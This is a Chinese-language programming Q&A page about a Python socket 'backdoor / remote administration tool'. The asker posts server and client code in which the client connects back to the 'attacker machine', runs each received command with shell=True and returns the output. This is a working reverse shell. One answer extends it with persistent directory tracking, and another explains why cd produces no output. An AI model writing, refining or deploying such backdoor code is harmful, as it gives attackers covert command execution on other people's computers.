python后门/远程管理工具命令工作除了cd

时间:2016-12-09 21:54:50

标签: python sockets

到目前为止,后门工作成功,客户端连接到服务器,服务器将命令发送到客户端,客户端将命令中的信息发送回服务器。但是,当我使用cd命令时,命令输出不会发送回服务器,是否有任何想法是客户端中的子流程代码?

这是我的服务器代码:

from socket import *
HOST = 'localhost'                 # '' means bind to all interfaces
PORT = 443                #  port
# create our socket handler
s = socket(AF_INET, SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# bind to interface
s.bind((HOST, PORT))
# print we are accepting connections
print ("Listening on ")
print (HOST)
print(PORT)
# listen for only 10 connection
s.listen(10)
# accept connections
conn, addr = s.accept()
# print connected by ipaddress
print 'Connected by', addr

# receive initial connection
data = conn.recv(1024)

while True:
  task = raw_input("Enter the task needed")

  if task == "cmd":
      # start loop
      while True:
          command = raw_input("Enter shell command or quit: ")
          # send shell command
          conn.send(command)
          # receive output from linux command
          data = conn.recv(1024)
          # print the output of the linux command
          print data
          # if we specify quit then break out of loop and close socket

          if command == "quit": break   

# close socket
conn.close()

The Client Code:

    import socket,subprocess
HOST = 'localhost'    # The remote host
PORT = 443            # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send("Connection Established!")
while True:
     # recieve shell command
     data = s.recv(1024)
     # do shell command
     proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
     # read output
     stdout_value = proc.stdout.read() + proc.stderr.read()
     # send output to attacker
     s.send(stdout_value)

     # if its quit, then break out and close socket
     if data == "quit": break
# close socket
s.close()

2 个答案:

答案 0 :(得分:0)

单独跟踪当前目录并将其与子进程调用一起使用。我将命令处理器拆分为一个单独的函数,它返回命令输出或None以退出。我疯狂猜测并返回cd命令中的当前目录...您可以根据需要更改它。

import re
import os

current_path = '.'

def run_command(data):
    global current_path
    if data.startswith("cd "):
        current_path = re.split(r'\w+', data)[1]
        return os.path.realpath(current_path) # what do you want to return here?
    elif data == "quit":
        return None  # check this in main program to quit
    else:
        proc = subprocess.Popen(data, shell=True, cwd=current_path,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE, 
            stdin=subprocess.PIPE)
        out, err = proc.communicate()
        return out + err

答案 1 :(得分:0)

  

当我使用cd命令时,命令输出不会发送回服务器

这是因为cd命令不会产生任何输出(至少如果成功则不会产生输出)。

相关问题
最新问题